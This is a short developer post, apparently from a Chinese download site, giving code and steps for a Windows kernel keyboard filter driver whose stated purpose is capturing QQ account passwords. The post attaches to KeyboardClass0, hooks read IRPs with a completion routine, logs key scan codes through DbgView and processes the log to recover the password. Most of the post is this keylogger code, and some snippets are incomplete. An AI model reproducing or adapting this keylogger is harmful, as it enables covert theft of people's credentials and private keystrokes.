I recently started looking at C++ and wrote a program to play with it. Because it is hard to intercept the QQ password from user-mode code, I wrote a layered (filter) keyboard driver. The test results are acceptable.
Development environment: VS2008, WinDDK, DDKWizard, Windows XP, DbgView
Implementation Method
1. Attach a filter driver on top of the keyboard class driver.
2. Set a completion routine on the read IRPs that pass through the filter.
3. Output the keyboard scan code to DbgView through KdPrint.
4. Read the keystrokes back from the DbgView log file.
Code
1. Attach the filter device to KeyboardClass0.
PFILE_OBJECT FileObject;
PDEVICE_OBJECT DeviceObject;
UNICODE_STRING DeviceName;
PDEVICE_EXTENSION pdx;
PDEVICE_OBJECT FilterDeviceObject;
PDEVICE_OBJECT TargetDevice;
FileObject = NULL;
// Look up the keyboard class device object by name
RtlInitUnicodeString(&DeviceName, L"\\Device\\KeyboardClass0");
status = IoGetDeviceObjectPointer(&DeviceName, FILE_ALL_ACCESS, &FileObject, &DeviceObject);
pdoDeviceObj->Flags |= DO_BUFFERED_IO;
pdx = (PDEVICE_EXTENSION)pdoDeviceObj->DeviceExtension;
pdx->pDevice = pdoDeviceObj;
pdx->ustrDeviceName = usDeviceName;
// Attach our filter device above the keyboard class device and remember the lower device
FilterDeviceObject = ((PDEVICE_EXTENSION)DriverObject->DeviceObject->DeviceExtension)->pDevice;
TargetDevice = IoAttachDeviceToDeviceStack(FilterDeviceObject, DeviceObject);
((PDEVICE_EXTENSION)DriverObject->DeviceObject->DeviceExtension)->TargetDevice = TargetDevice;
// Mirror the lower device's type, characteristics and I/O method so IRPs are handled consistently
FilterDeviceObject->DeviceType = TargetDevice->DeviceType;
FilterDeviceObject->Characteristics = TargetDevice->Characteristics;
FilterDeviceObject->Flags &= ~DO_DEVICE_INITIALIZING;
FilterDeviceObject->Flags |= (TargetDevice->Flags & (DO_DIRECT_IO | DO_BUFFERED_IO));
ObDereferenceObject(FileObject);
return STATUS_SUCCESS;
2. Set the completion routine (in the read dispatch routine)
PDEVICE_EXTENSION pdx;
pdx = (PDEVICE_EXTENSION)DeviceObject->DeviceExtension;
// Pass the IRP down unchanged, but get called back when the lower driver completes it
IoCopyCurrentIrpStackLocationToNext(Irp);
IoSetCompletionRoutine(Irp, MyIoCompletion, NULL, TRUE, TRUE, TRUE);
NTSTATUS status = IoCallDriver(pdx->TargetDevice, Irp);
return status;
3. Output the scan code of the pressed keys
NTSTATUS MyIoCompletion(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp, IN PVOID Context)
{
    if (NT_SUCCESS(Irp->IoStatus.Status))
    {
        // The completed read IRP carries KEYBOARD_INPUT_DATA records in the system buffer
        PKEYBOARD_INPUT_DATA keys = (PKEYBOARD_INPUT_DATA)Irp->AssociatedIrp.SystemBuffer;
        // Flags 0x0001 / 0x0003 are key-release (break) events, optionally with the E0 prefix
        if (keys->Flags == 0x0001 || keys->Flags == 0x0003)
            KdPrint(("%02x", keys->MakeCode));
    }
    if (Irp->PendingReturned)
    {
        IoMarkIrpPending(Irp);
    }
    return STATUS_SUCCESS;
}
Procedure
1. Install the driver
Use DriverMonitor to load and run the driver file driver1.sys.
2. Open DbgView. When you press a key, the keyboard scan code appears in DbgView.
3. Select the log-file recording option in DbgView, then process the log file to obtain the QQ password.
I am still a C++ newbie; experts are welcome to criticize and correct me, and I would like to exchange ideas. Thank you. Email: 328452421@qq.com
Source: http://download.csdn.net/detail/xiaoxiao108/4303441